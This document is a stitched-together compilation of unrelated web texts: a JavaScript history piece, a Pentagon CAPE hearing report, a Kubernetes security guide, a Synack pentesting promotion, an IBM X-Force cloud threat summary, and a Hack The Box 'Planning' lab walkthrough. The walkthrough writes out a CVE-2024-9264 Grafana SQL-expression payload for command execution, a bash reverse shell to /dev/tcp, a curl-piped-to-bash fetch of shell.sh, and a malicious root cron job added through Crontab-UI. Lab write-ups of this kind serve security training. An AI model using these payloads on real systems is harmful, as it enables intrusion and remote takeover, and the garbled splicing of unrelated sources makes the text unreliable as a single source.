Thirty years ago today, Netscape Communications and Sun Microsystems issued a joint press release announcing JavaScript, an object scripting language designed for creating interactive web applications. The language emerged from a frantic 10-day sprint at pioneering browser company Netscape, where engineer Brendan Eich hacked together a working internal prototype during May 1995.
While the JavaScript language didn’t ship publicly until that September and didn’t reach a 1.0 release until March 1996, the descendants of Eich’s initial 10-day hack now run on approximately 98.9 percent of all websites with client-side code, making JavaScript the dominant programming language of the web. It’s wildly popular; beyond the browser, JavaScript powers server backends, mobile apps, desktop software, and even some embedded systems. According to several surveys, JavaScript consistently ranks among the most widely used programming languages in the world.
In crafting JavaScript, Netscape wanted a scripting language that could make webpages interactive, something lightweight that would appeal to web designers and non-professional programmers. Eich drew from several influences: The syntax looked like a trendy new programming language called Java to satisfy Netscape management, but its guts borrowed concepts from Scheme, a language Eich admired, and Self, which contributed JavaScript’s prototype-based object model.
The White House’s nominee to lead the Pentagon’s Cost Assessment and Program Evaluation (CAPE) office, which has long been criticized for overstepping its advisory role, told lawmakers he would work to restore the office’s credibility by refocusing it on its statutory mission as an independent adviser rather than a decision-maker.
“I have seen CAPE take on an advocacy role that I think is inappropriate for an independent analytic organization,” Michael Payne, who is currently serving as the acting director of CAPE, told the Senate Armed Services Committee Thursday.
CAPE has faced scrutiny over the years for operating beyond its statutory responsibilities — in 2023, the House Armed Services Committee even proposed eliminating the office altogether. While Congress ultimately decided against shutting down the office, the fiscal 2024 defense policy bill required the Defense Department to overhaul how it operates.
The annual legislation required the Pentagon to create an analysis working group, which would work with CAPE, the Joint Staff and DoD components to improve analytic standards across the force. The bill also required the department to stand up an analytical team, or the “program evaluation competitive analysis cell” — an independent team to review CAPE’s methodologies, assumptions and data.
In addition, the law mandated a pilot program on alternative analysis to test new approaches for evaluating defense programs.
So far, only one of those requirements has been met. “We have stood up the analysis working group, but we absolutely need to do more. Red teaming is an important part of any scientific or analytic endeavor, and if I’m confirmed, I will make it a priority to ensure that we comply fully,” Payne said.
Sen. Roger Wicker (R-Miss.), who leads the Senate Armed Services Committee, voiced frustration during the confirmation hearing that little progress has been made, even though Payne has been in a leadership role at CAPE since the bill was signed into law.
“You’ve been deputy director since the law passed, and since January, you’ve been acting director. And yet, the second and third directives of the statute passed by the Congress and signed into law by the commander-in-chief have not been implemented — that is a concern,” Wicker said.
In his written responses to lawmakers’ questions ahead of his confirmation hearing, Payne said steering the office back to its roots and away from advocacy would be his biggest challenge. The effort, he said, would require reforming the office’s cost-estimating and program-evaluation processes to better align with ongoing, department-wide acquisition reform initiatives.
“I would address the program-evaluation process by reforming the analysis of alternatives approach to better align with the reformed requirements and acquisition processes, including early engagement with industry. For cost estimating, I would focus on ensuring cost reporting requirements for industry are less burdensome in order to better facilitate the entry of non-traditional vendors into the acquisition process,” Payne said.
When asked if he believes that the CAPE office would benefit from outside reviews of its processes, Payne said he recommends “using existing government entities to conduct such reviews, that the reviews be targeted with specific objectives, and that DCAPE be given an opportunity to address the findings directly in order to implement improvements.”
‘Strained’ workforce
Payne said while the team is still capable of meeting existing legal requirements by pushing some of its cost-estimation work to the military services, CAPE’s workforce is stretched thin.
“The recent addition of statutory requirements for military construction and sustainment review cost estimating has necessitated increased delegation to the services,” Payne said.
“I believe the workforce is sufficient, though strained in certain areas as it adapts to broader national workforce demographic and skill shifts,” he added.
In this write-up, we will explore the “Planning” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Planning” machine from Hack The Box by achieving the following objectives:
User Flag:
During reconnaissance, extensive fuzzing was required to identify a Grafana instance vulnerable to CVE-2024-9264—a critical flaw enabling arbitrary command execution through unsanitized SQL inputs in the DuckDB CLI. By deploying a proof-of-concept exploit, I successfully extracted files and ran commands, gaining entry to the Grafana container but not the underlying host. Subsequent enumeration uncovered valid credentials for the user “enzo,” which granted SSH access to the host system.
Root Flag:
Once on the host, I discovered the Crontab-UI service—a web-based tool for managing cron jobs—running on localhost:8000 and secured with Basic Authentication. Leveraging the earlier credentials for the “enzo” user, I authenticated to the interface and added a malicious cron job configured to establish a reverse shell connection.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
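A typical pair of scans for a box like this might look as follows (a sketch; the target IP is a placeholder for your assigned address):

```bash
# Sweep all TCP ports quickly, then run default scripts and version detection
# against the ports that respond (10.10.11.68 is a placeholder target IP)
nmap -p- --min-rate 5000 -oA scans/alltcp 10.10.11.68
nmap -p 22,80 -sC -sV -oA scans/tcp-detail 10.10.11.68
```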
Port 22 (SSH): Secure Shell service for remote access.
Port 80 (HTTP): Web server running Apache.
Web Application Exploration:
The website for Edukate appears to be a standard educational platform.
What is Edukate?
Edukate is a free educational website template designed for online learning platforms and academic institutions. Its intuitive layout improves user engagement, while its clean, developer-friendly codebase makes customization simple. Built with Sass for easy maintenance, Edukate is optimized for page speed to deliver fast loading times and lower bounce rates. It is fully cross-browser compatible, ensuring a smooth experience across all major browsers, and SEO-friendly to help boost search engine rankings.
Gobuster found a valid virtual host: grafana.planning.htb.
This is likely an internal service meant for the organization’s team, not a public endpoint.
Since it contains grafana, it strongly suggests it is a Grafana dashboard instance.
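For reference, a virtual-host fuzz along these lines would surface it (a sketch; the wordlist path and the placeholder IP in the /etc/hosts entries are assumptions):

```bash
# Map the base hostname first so requests resolve, then brute-force virtual hosts
echo '10.10.11.68 planning.htb' | sudo tee -a /etc/hosts

gobuster vhost -u http://planning.htb \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  --append-domain

# Add the discovered vhost so the browser and curl can reach it
echo '10.10.11.68 grafana.planning.htb' | sudo tee -a /etc/hosts
```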
Grafana Application
The grafana.planning.htb subdomain loads successfully and displays the Grafana login page.
We should be able to log in using the credentials provided by Hack The Box.
Username: admin
Password: 0D5oT70Fq13EvB5r
We need to inspect the traffic using Burp Suite.
First, I noticed that the endpoint /api/user/auth-tokens-rotate is available here.
We successfully gained access to the Grafana dashboard.
We also confirmed that the Grafana instance is running version 11.0.0.
There are numerous tokens being rotated here.
This is what the response looks like in Burp Suite.
Critical SQL Expression Vulnerability in Grafana Enabling Authenticated LFI/RCE
This vulnerability targets Grafana 11’s experimental SQL Expressions feature, which allows users to post-process query results via custom SQL using DuckDB. The flaw arises because user input isn’t properly sanitized before being sent to the DuckDB CLI, enabling remote code execution (RCE) or arbitrary file reads. The root cause is unfiltered input passed directly to the DuckDB command-line interface. The CVSS v3.1 score is 9.9 (Critical).
Grafana doesn’t include DuckDB by default. For exploitation, DuckDB must be installed on the server and accessible in Grafana’s PATH. If it’s absent, the system is safe.
Using a PoC, we can exploit this flaw to read system files, demonstrating its impact and severity.
Let’s search Google for potential exploits targeting Grafana v11.0.0.
This flaw enables authenticated users to attain remote code execution (RCE). I exploited it using the publicly available proof-of-concept from Nollium’s GitHub repository.
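Under the hood, the PoC drives Grafana’s expression-evaluation endpoint; a hedged, hand-rolled equivalent of the file-read request (the exact JSON shape and DuckDB function may differ from Nollium’s script) looks roughly like this:

```bash
# Authenticated POST to /api/ds/query; the SQL expression is handed to the DuckDB CLI,
# which reads arbitrary local files on the Grafana host
curl -s -u 'admin:0D5oT70Fq13EvB5r' \
  -H 'Content-Type: application/json' \
  http://grafana.planning.htb/api/ds/query -d '{
    "queries": [{
      "refId": "A",
      "datasource": {"type": "__expr__", "uid": "__expr__", "name": "Expression"},
      "type": "sql",
      "expression": "SELECT content FROM read_text('\''/etc/passwd'\'')",
      "window": ""
    }],
    "from": "now-6h",
    "to": "now"
  }'
```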
We successfully retrieved the /etc/passwd file.
When we ran the whoami command, it returned root, which is unexpected.
Let’s set up our listener.
Unfortunately, we were unable to execute the command due to an error.
As suspected, this is running inside a Docker container.
The environment variables reveal the Grafana admin credentials:
GF_SECURITY_ADMIN_USER=enzo
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!.
Exploit CVE-2024-9264 using Burp Suite.
The api/ds/query endpoint is available in Grafana, and we can leverage it for this exploit.
If the full path is not specified, it responds with a “Not Found” message.
However, attempting to execute the full path results in an “Unauthorized” response.
The response is still the same; we need to send the crafted JSON payload in the request body.
This JSON payload is a crafted query sent to Grafana’s api/ds/query endpoint. It uses the Expression data source with an SQL expression to run a sequence of commands: first installing and loading the shellfs extension, then executing whoami and redirecting the output to /tmp/output.txt. This effectively demonstrates command execution through CVE-2024-9264.
Reading the contents of /tmp/output.txt confirms that the whoami command executed on the target machine.
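Reconstructed from that description, the interesting parts of the payload are the two SQL expressions below; they ride in the same request skeleton shown earlier, and the shellfs syntax is a hedged sketch rather than a verbatim copy:

```bash
# Expression 1: install/load the community shellfs extension, then abuse read_csv's
# trailing-pipe filename syntax to run a shell command and capture its output
EXEC_EXPR="SELECT 1; INSTALL shellfs FROM community; LOAD shellfs; \
SELECT * FROM read_csv('whoami > /tmp/output.txt |');"

# Expression 2: a plain file read afterwards retrieves the command output
READ_EXPR="SELECT content FROM read_text('/tmp/output.txt');"
```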
Let’s set up our listener to catch the reverse shell.
Use this SQL command to execute the bash script.
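Assuming shell.sh is a standard bash reverse shell hosted on our machine (IPs, ports, and filenames below are placeholders), the listener, the hosted script, and the expression look roughly like this:

```bash
# On our machine: write the reverse shell, serve it over HTTP, and start a listener
cat > shell.sh <<'EOF'
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.2/4444 0>&1
EOF
python3 -m http.server 8000 &
nc -lvnp 4444

# SQL expression sent via api/ds/query (hedged sketch): fetch the script and pipe it to bash
#   SELECT 1; INSTALL shellfs FROM community; LOAD shellfs;
#   SELECT * FROM read_csv('curl -s http://10.10.14.2:8000/shell.sh | bash |');
```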
It’s hanging, which is a good sign that the payload is executing.
We successfully received a reverse shell connection.
We attempted to switch to the enzo user with su enzo, but it didn’t work.
SSH worked perfectly and allowed us to log in successfully.
We were able to read the user flag by running cat user.txt.
Escalating to Root Privileges
Privilege Escalation:
Locate the database file.
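A quick way to hunt for it (the search locations are just a guess):

```bash
# Look for database files under /opt and the user's home directory
find /opt /home -name '*.db' 2>/dev/null
```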
We discovered /opt/crontabs/crontab.db.
The password for root_grafana is P4ssw0rdS0pRi0T3c.
Port 8000 is open here, which is unusual.
Let’s set up port forwarding for port 8000.
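Since the service only listens on the target’s loopback interface, an SSH local forward with enzo’s credentials exposes it to our machine:

```bash
# Local port 8000 now tunnels to 127.0.0.1:8000 on the target
ssh -L 8000:127.0.0.1:8000 enzo@planning.htb
# Then browse to http://127.0.0.1:8000 and authenticate to Crontab-UI
```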
We need to provide the credentials to log in.
We need to use the credentials we discovered earlier to log in.
It turned out to be a cron jobs management interface.
What is Crontab-UI?
Crontab-UI is an open-source Node.js web interface for managing cron jobs on Unix-like systems, simplifying tasks like creating, editing, pausing, deleting, and backing up crontab entries via a browser (default: http://localhost:8000). It reduces errors from manual text editing, supports error logging, email notifications, webhooks, and easy import/export for multi-machine deployment. Installation is via npm (npm install crontab-ui -g), with optional Docker support and Basic Auth for security. Ideal for beginners handling scheduled tasks.
We need to create a new cron job command.
The shell.sh file contains the reverse shell that will connect back to us.
We will use curl to fetch the file, as demonstrated earlier.
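As a sketch (attacker IP, port, and schedule are placeholders), the new Crontab-UI job and the supporting pieces on our side could look like this:

```bash
# Command entered for the new Crontab-UI job, scheduled every minute and run as root:
#   curl -s http://10.10.14.2:8000/shell.sh | bash

# On our machine: shell.sh is the same reverse shell as before, served over HTTP,
# with a fresh listener waiting for the root callback
python3 -m http.server 8000 &
nc -lvnp 4444
```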
The file was transferred successfully, as expected.
We were able to access the root shell and read the root flag by running cat root.txt.
The IT world is changing rapidly, and containers and Kubernetes (K8s) are becoming ever more popular. The shift from virtual machines to containers, and later to container orchestration platforms (the first version of Docker was released in 2013), took place within just seven years. While some startups are still learning how to benefit from these new resources, some established companies are looking for ways to migrate their legacy systems to more efficient infrastructures.
The rapid adoption of containers and Kubernetes shows how disruptive these technologies are. However, they have also introduced new security problems. Because containers and Kubernetes are so popular, and are deployed by many organizations without adequate security measures, they make perfect targets for attackers.
A K8s cluster consists of multiple machines managed by a master node (and its replicas). Such a cluster can comprise thousands of machines and services, which makes it an excellent attack vector. It is therefore important to implement strict security practices.
Securing Your Cluster
A Kubernetes cluster contains numerous moving parts that must be adequately protected. Securing the cluster is not a one-time task, however; it requires best practices and a competent security team.
Below, we walk through several Kubernetes attack vectors along with best practices for protecting your K8s cluster.
Keeping Kubernetes and the Nodes Up to Date
K8s is an open-source system that is updated continuously. Its GitHub repository is among the most active on the platform, with new features, improvements, and security updates added all the time.
A new minor version of Kubernetes, with new features to improve the service, is released roughly every four months. At the same time, as with any software, and especially frequently updated software, new security issues and bugs are introduced along the way.
Security vulnerabilities are also found in older versions, so it is important to understand how the Kubernetes team handles security updates in those cases. Unlike Linux distributions and other platforms, Kubernetes has no LTS version. Instead, Kubernetes aims to backport security fixes to the three most recently released minor versions.
It is therefore important that your cluster runs one of the three most recently released minor versions and that security patches are applied promptly. You should also upgrade to the latest minor version at least once every twelve months.
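As a hedged sketch (assuming a kubeadm-managed cluster; managed services expose the same idea through their own tooling, and the version number below is a placeholder), checking the running version and planning an upgrade might look like this:

```bash
# Show the versions currently running on the control plane and the nodes
kubectl version
kubectl get nodes -o wide

# On a kubeadm-managed control-plane node: list available upgrades, then apply one
kubeadm upgrade plan
kubeadm upgrade apply v1.31.2

# Afterwards, upgrade kubelet/kubectl on each node via the OS package manager
# and restart the kubelet
```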
In addition to its core components, Kubernetes uses nodes that run the workloads assigned to the cluster. These nodes can be physical or virtual machines running an operating system, and each node is a potential attack vector that must be kept updated to avoid security problems. To reduce the attack surface, the nodes should be kept as clean as possible.
Restricting Access Rights
Role-based access control (RBAC) is one of the best approaches for controlling which users can access the cluster and how. It lets you define access rights for each individual user in detail. The rules are additive, so every permission must be granted explicitly. With RBAC you can restrict access rights (view, read, or write) for every Kubernetes object, from pods (the smallest K8s compute unit) to namespaces.
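As a minimal sketch of this additive model (the namespace, role, and user names are made up for illustration), a read-only grant scoped to a single namespace could be created like this:

```bash
# Role that only allows viewing pods in the "team-a" namespace
kubectl create role pod-reader \
  --verb=get --verb=list --verb=watch \
  --resource=pods \
  -n team-a

# Bind the role to a single user; anything not granted here remains forbidden
kubectl create rolebinding pod-reader-jane \
  --role=pod-reader \
  --user=jane \
  -n team-a
```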
RBAC can also be tied to an external directory service via OpenID Connect tokens, so that user and group management happens centrally and can be applied more broadly across the organization.
Access rights are not limited to Kubernetes itself. If users need access to a cluster node to diagnose problems, for example, it makes sense to create temporary users and delete them again once the problems are resolved.
Best Practices for Containers
Docker, the most widely used container technology, is built from layers: the innermost layer is the most basic structure, and the outermost layer is the most specific. Every Docker image therefore starts from some form of distribution or language support, with each new layer adding a feature or modifying the previous one. The container contains everything needed to start the application.
These layers (also referred to as images) can be available publicly on Docker Hub or privately in another image registry. At build time an image can be referenced in two ways: by name plus tag (e.g. node:latest) or by an immutable SHA digest (e.g. sha256:d64072a554283e64e1bfeb1bb457b7b293b6cd5bb61504afaa3bdd5da2a7bc4b).
The image behind a tag can be changed by the repository owner at any time; the latest tag simply points to the newest available version. That also means the inner layer can change suddenly and without notice when a new image is built or an image with that tag is run.
This causes two problems: (1) you lose control over what is running in your Kubernetes instance when an outer layer is updated and causes a conflict, or (2) the image is deliberately modified to introduce a security vulnerability.
To avoid the first problem, avoid the latest tag and pick a specific tag that names the version (e.g. node:14.5.0). To avoid the second, use official images and either clone the image into your private repository or reference it by its SHA digest.
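A short sketch of the difference (the digest is the one quoted above; the private registry name is illustrative):

```bash
# Mutable reference: whatever the repository owner most recently pushed to this tag
docker pull node:latest

# Pinned to a specific version tag
docker pull node:14.5.0

# Pinned to an immutable content digest; the layers can never change underneath you
docker pull node@sha256:d64072a554283e64e1bfeb1bb457b7b293b6cd5bb61504afaa3bdd5da2a7bc4b

# Or mirror an official image into a private registry you control
docker tag node:14.5.0 registry.example.com/base/node:14.5.0
docker push registry.example.com/base/node:14.5.0
```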
Another approach is to use a vulnerability scanning tool and check the images continuously. Such tools can run alongside continuous integration pipelines and monitor the image registry to catch previously undetected problems.
When building a new image, keep in mind that each image should contain only one service. Dependencies should also be kept to a minimum in order to reduce the attack surface to the components that are essential for that service. When each image contains only one application, it is also easier to update to newer versions and to allocate resources.
Network Security
The previous section was about reducing the attack surface, and the same applies to networking. Kubernetes provides virtual networks inside the cluster that can restrict access between pods and permit external access so that only approved services are reachable. This is a basic approach that works only in small clusters.
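As a hedged sketch of that built-in mechanism (namespace and label names are made up, and it assumes your CNI plugin actually enforces NetworkPolicy), a default-deny rule plus one explicitly allowed path could look like this:

```bash
# Deny all ingress to pods in "team-a" unless a later policy allows it,
# then permit only frontend pods to reach backend pods on port 8080
kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-ingress
  namespace: team-a
spec:
  podSelector: {}
  policyTypes: ["Ingress"]
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-backend
  namespace: team-a
spec:
  podSelector:
    matchLabels:
      app: backend
  policyTypes: ["Ingress"]
  ingress:
    - from:
        - podSelector:
            matchLabels:
              app: frontend
      ports:
        - protocol: TCP
          port: 8080
EOF
```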
Larger clusters, with multiple services developed by different teams, are far more complex. In those cases a centralized approach may not be feasible; service meshes are considered the best option instead. A service mesh creates an encrypted network layer over which services can communicate securely. Meshes usually run as sidecar agents, attached like a sidecar to each pod, and handle communication between the services. Beyond security, service meshes also provide discovery, monitoring/tracing/logging, and help avoid service outages, for example through a design pattern known as circuit breaking.
Setting Resource Quotas
Since applications are updated more or less constantly, simply implementing the measures described above is not enough to secure your cluster. The risk of a breach always remains.
Another important step is the use of resource quotas, with which Kubernetes confines the blast radius of a failure to the defined limits. When these limits are well defined, a resource-exhaustion event cannot take down every service in the cluster.
It also prevents an enormous cloud bill at the end of the month.
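A minimal sketch of a per-namespace quota (the namespace name and limits are illustrative):

```bash
# Cap the total CPU, memory, and pod count the "team-a" namespace may consume
kubectl create quota team-a-quota \
  --hard=requests.cpu=4,requests.memory=8Gi,limits.cpu=8,limits.memory=16Gi,pods=20 \
  -n team-a

# Inspect how much of the quota is currently in use
kubectl describe quota team-a-quota -n team-a
```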
Monitoring and Logging
Monitoring the cluster (from the cluster level down to the pods) is essential for detecting failures and identifying their causes. Above all, it is about spotting unusual behavior: if network traffic has increased or the nodes' CPUs behave differently, further investigation is needed to track down the problem. While monitoring is mostly about metrics such as CPU, memory, and network performance, logging provides additional (historical) information that helps quickly identify unusual patterns or the source of a problem.
Prometheus and Grafana, used together, are well suited to effective Kubernetes monitoring. Prometheus is a high-performance time-series database, while Grafana can read the data from Prometheus and present it in clear graphical dashboards.
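A hedged sketch of getting that pair running with Helm (the chart comes from the prometheus-community project; the release and namespace names are illustrative):

```bash
# Install Prometheus and Grafana together via the kube-prometheus-stack chart
helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
helm repo update
helm install monitoring prometheus-community/kube-prometheus-stack \
  --namespace monitoring --create-namespace

# Reach the bundled Grafana locally to browse the default Kubernetes dashboards
kubectl port-forward -n monitoring svc/monitoring-grafana 3000:80
```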
ElasticSearch is another useful tool and is one of the most popular options for centrally logging applications, nodes, and Kubernetes itself in near real time.
Cloud or On-Premises: The Security Considerations
Kubernetes can be installed on premises or through a managed cloud service. With an on-premises deployment, every configuration step (bringing up new machines, setting up the network, and securing the application) must be done manually. With cloud-based services such as Google GKE, AWS EKS, or Azure AKS, K8s can be installed with minimal configuration effort and is automatically compatible with the provider's other services.
From a security standpoint, on-premises setups require considerably more attention. As mentioned above, every new update must be downloaded and configured by your team, and the nodes must be updated as well. On-premises Kubernetes environments should therefore only be deployed by an experienced team.
With cloud-managed services, the process is much simpler: Kubernetes comes pre-installed, and the cloud provider keeps all nodes up to date with the latest security features. For the cluster itself, most cloud providers let users choose from several K8s versions and provide ways to upgrade to a new version. This approach is simpler, but less flexible.
Closing Remarks
Given constant updates and the flood of new tools hitting the market, keeping everything patched and closing security gaps takes considerable effort, and breaches are practically unavoidable. With Kubernetes the challenge is even greater, because it is not just a single tool: Kubernetes is made up of several tools that in turn manage other tools, machines, and networks. Security therefore plays a central role.
Given this dynamic environment, securing Kubernetes is anything but easy. Keep these tips in mind:
Check the applications running on K8s for security issues.
Restrict and control access.
Make sure all components have the latest security updates, and monitor the cluster continuously so that failures can be fixed immediately and damage avoided.
The challenge is even greater with on-premises deployments, where real hardware has to be managed, automation set up, and more software kept up to date. If you follow the best practices described here, you gain a significant security advantage and can keep your Kubernetes environment running securely and reliably.
The SentinelOne platform supports physical and virtual machines, Docker, self-managed Kubernetes instances, and Kubernetes deployments managed by cloud service providers such as AWS EKS. To learn more, request a free demo today.
Penetration Testing and Formula One Racing – Preparation is Key
By Nathan JonesDirector, Customer Success, Synack
In Formula One, the most prepared teams have the best chances of success. Yet, preparation alone isn’t going to clinch a victory. Many factors contribute to crossing the finish line first: track conditions, weather, car setup, strategy changes and updates, as well as driver skill and decision making.
At Synack, we’ve got you covered throughout the entire engagement on our Crowdsourced Penetration Testing Platform before and after our trusted network of security researchers go to work hunting for your vulnerabilities.
Here’s what to expect throughout the Synack engagement:
It starts with high-quality, trusted researchers
Your pit team: Researchers’ skills are critically important to the success of any pentest. Because the vulnerability landscape is so broad and diverse, a single researcher — or even a small number of researchers — won’t have expertise across all vulnerability categories to fully test the assets in question.
That’s the value of the Synack crowdsourced testing platform: we attract the best researchers, with a wide variety of skills and backgrounds. This allows large numbers of researchers to bring their experience to bear across the range of vulnerability categories, enabling the most thorough test of the assets in scope.
Results get collected in a well-designed platform
Right car, right tools: A top-quality vulnerability management platform should underpin any pentest initiative, allowing customers to manage the full vulnerability lifecycle from initial reports to analyst review and on to remediation. At Synack, the customer portal lets your team track vulnerabilities as they flow through a logical, easy-to-use workflow from discovery to patch to patch verification.
In addition, our triage process ensures that vulnerability findings passed to the customer are valid, reproducible, high quality and actionable. This allows the customer to focus efforts on understanding the issues and taking appropriate action, saving considerable time and effort.
Control the testing environment and parameters
Know the course: Some penetration tests can be intrusive and noisy. The Synack experience has been designed to make the process as simple and seamless as possible. It is carried out in a controlled manner to mitigate any impact on the client’s everyday business operations. Researchers work from a known source IP to ensure proper monitoring. Customers are encouraged to monitor activity and traffic during the test, but we recommend waiting for a formal vulnerability report before any patching: patching during a test limits researchers’ ability to validate the finding and to be rewarded for it.
Engage with researchers before and after the test
Connected to the pit crew: A testing engagement should not be a fire-and-forget activity. Customers should be looking to provide regular feedback, including information about new releases or changes, areas of scope on which researchers should focus and updates on any customer actions.
Scope changes are a critical area of communication. A class of vulnerabilities caused by the same underlying issue should be temporarily removed from scope to prevent inundating the client with repetitive findings. We do this at Synack because it reduces noise as well as shifts the focus of researchers to other areas, thus ensuring better coverage.
Augment manual testing with smart automation
Change out the equipment when needed: Penetration testing harnesses human creativity to create value, but automated scanners are an important tool as well, helping to augment human efforts. Too often, however, security teams have had to accept trade-offs, investing in cheap self-service scanning solutions to get broad attack surface coverage. There’s a better way: smarter technologies built on machine learning principles can make a difference and help scale the testing effort. At Synack, SmartScan®, our vulnerability assessment solution, enables, rather than burdens, security teams by scaling security testing and accelerating their vulnerability remediation processes. SmartScan® combines industry-best scanning technology, proprietary risk identification technology, and a crowd of the world’s best security researchers, the Synack Red Team (SRT), for noiseless scanning and high-quality triage.
Recognize the possibility of unintended consequences
Expect the unexpected: Every pentester and testing company seeks to avoid unwanted impact to the customer. Most issues can be avoided by having an accurate scope and researcher guidelines agreed ahead of testing. On the rare occasion that there is an incident, we have a process in place to deal with it immediately.
Act on the results
Celebrate your wins, learn from your mistakes: It’s essential that clients act on findings. Just discovering vulnerabilities does not improve an organization’s risk posture. The vulnerabilities should be patched and remediated as soon as possible. Clients should look to monitor and track their risk posture over time using a risk metric such as Synack’s Attacker Resistance Score to chart improvements.
For long-term testing engagements, clients should not wait until the pentest has completed, but should fix issues and receive confirmation from the pentester that the mitigation was successful throughout the test.
Verifying compliance with necessary regulations is also a key part of using the results of a penetration test. Synack strongly recommends that clients opt for a testing package that includes compliance checks, such as relevant OWASP categories, PCI DSS 11.3, or NIST SP 800-53. A testing checklist provides auditable documentation for compliance-driven penetration testing requirements.
Keep on testing
Always winning: In Formula One, when the race ends, the work isn’t over. There are always more races to run and further developments and improvements to make to stay ahead of the pack.
The same is true in pentesting. As adversaries grow more advanced, staying one step ahead in cybersecurity is more important than ever, and regular pentesting is a key component of doing so. An organization is only as strong as its weakest link, making appropriate pentesting across the entire attack surface critical to remaining cyber secure.
Winning looks like an overall reduction in vulnerability risk. While it’s impossible to eliminate all vulnerabilities, a healthy pentesting cadence will strengthen your security posture over time.
Nathan Jones is Director of Client Operations at Synack. He’s also a huge racing fan.
While cloud computing and its many forms (private, public, hybrid cloud or multi-cloud environments) have become ubiquitous with innovation and growth over the past decade, cybercriminals have closely watched the migration and introduced innovations of their own to exploit the platforms. Most of these exploits are based on poor configurations and human error. New IBM Security X-Force data reveals that many cloud-adopting businesses are falling behind on basic security best practices, introducing more risk to their organizations.
Shedding light on the “cracked doors” that cybercriminals are using to compromise cloud environments, the 2022 X-Force Cloud Threat Landscape Report uncovers that vulnerability exploitation, a tried-and-true infection method, remains the most common way to achieve cloud compromise. Gathering insights from X-Force Threat Intelligence data, hundreds of X-Force Red penetration tests, X-Force Incident Response (IR) engagements and data provided by report contributor Intezer, between July 2021 and June 2022, some of the key highlights stemming from the report include:
Cloud Vulnerabilities are on the Rise — Amid a sixfold increase in new cloud vulnerabilities over the past six years, 26% of cloud compromises that X-Force responded to were caused by attackers exploiting unpatched vulnerabilities, becoming the most common entry point observed.
More Access, More Problems — In 99% of pentesting engagements, X-Force Red was able to compromise client cloud environments through users’ excess privileges and permissions. This type of access could allow attackers to pivot and move laterally across a victim environment, increasing the level of impact in the event of an attack.
Cloud Account Sales Gain Ground in Dark Web Marketplaces — X-Force observed a 200% increase in cloud accounts being advertised on the dark web, with remote desktop protocol access and compromised credentials being the most popular cloud account sales making the rounds on illicit marketplaces.
As the rise of IoT devices drives more and more connections to cloud environments, the potential attack surface grows larger, introducing critical challenges that many businesses are already experiencing, such as proper vulnerability management. Case in point: the report found that more than a quarter of studied cloud incidents were caused by known, unpatched vulnerabilities being exploited. While the Log4j vulnerability and a vulnerability in VMware Cloud Director were two of the more commonly leveraged vulnerabilities observed in X-Force engagements, most of the exploited vulnerabilities primarily affected the on-premises versions of applications, sparing the cloud instances.
As suspected, cloud-related vulnerabilities are increasing at a steady rate, with X-Force observing a 28% rise in new cloud vulnerabilities over the last year alone. With over 3,200 cloud-related vulnerabilities disclosed in total to date, businesses face an uphill battle when it comes to keeping up with the need to update and patch an increasing volume of vulnerable software. In addition to the growing number of cloud-related vulnerabilities, their severity is also rising, made apparent by the uptick in vulnerabilities capable of providing attackers with access to more sensitive and critical data as well as opportunities to carry out more damaging attacks.
These ongoing challenges point to the need for businesses to pressure test their environments and not only identify weaknesses in their environment, like unpatched, exploitable vulnerabilities, but prioritize them based on their severity, to ensure the most efficient risk mitigation.
Excessive Cloud Privileges Aid in Bad Actors’ Lateral Movement
The report also shines a light on another worrisome trend across cloud environments — poor access controls, with 99% of pentesting engagements that X-Force Red conducted succeeding due to users’ excess privileges and permissions. Businesses are allowing users unnecessary levels of access to various applications across their networks, inadvertently creating a stepping stone for attackers to gain a deeper foothold into the victim’s cloud environment.
The trend underlines the need for businesses to shift to zero trust strategies, further mitigating the risk that overly trusting user behaviors introduce. Zero trust strategies enable businesses to put in place appropriate policies and controls to scrutinize connections to the network, whether from an application or a user, and iteratively verify their legitimacy. In addition, as organizations evolve their business models to innovate at speed and adapt with ease, it’s essential that they properly secure their hybrid, multi-cloud environments. Central to this is modernizing their architectures: not all data requires the same level of control and oversight, so determining the right workloads to put in the right place for the right reason is important. Not only can this help businesses effectively manage their data, it also enables them to place efficient security controls around it, supported by proper security technologies and resources.
Dark Web Marketplaces Lean Heavier into Cloud Account Sales
With the rise of the cloud comes a rise in cloud accounts being sold on the dark web; X-Force observed a 200% increase in such listings in the last year alone. Specifically, X-Force identified over 100,000 cloud account ads across dark web marketplaces, with some account types more popular than others. Seventy-six percent of the cloud account sales identified were Remote Desktop Protocol (RDP) access accounts, a slight uptick from the year prior. Compromised cloud credentials were also up for sale, accounting for 19% of the cloud accounts advertised in the marketplaces X-Force analyzed.
The going price for this type of access is remarkably low, making these accounts easily attainable for the average bidder: RDP access and compromised credentials sell for an average of $7.98 and $11.74, respectively. The roughly 47% higher selling price of compromised credentials is likely due to their ease of use, as well as the fact that postings advertising credentials often include multiple sets of login data, potentially from other services stolen along with the cloud credentials, yielding a higher ROI for cybercriminals.
As more compromised cloud accounts pop up across these illicit marketplaces for malicious actors to exploit, it’s important that organizations work toward enforcing more stringent password policies by urging users to regularly update their passwords, as well as implement multifactor authentication (MFA). Businesses should also be leveraging Identity and Access Management tools to reduce reliance on username and password combinations and combat threat actor credential theft.
To read our comprehensive findings and learn about detailed actions organizations can take to protect their cloud environments, review our 2022 X-Force Cloud Security Threat Landscape here.
If you’re interested in signing up for the “Step Inside a Cloud Breach: Threat Intelligence and Best Practices” webinar on Wednesday, September 21, 2022, at 11:00 a.m. ET, you can register here.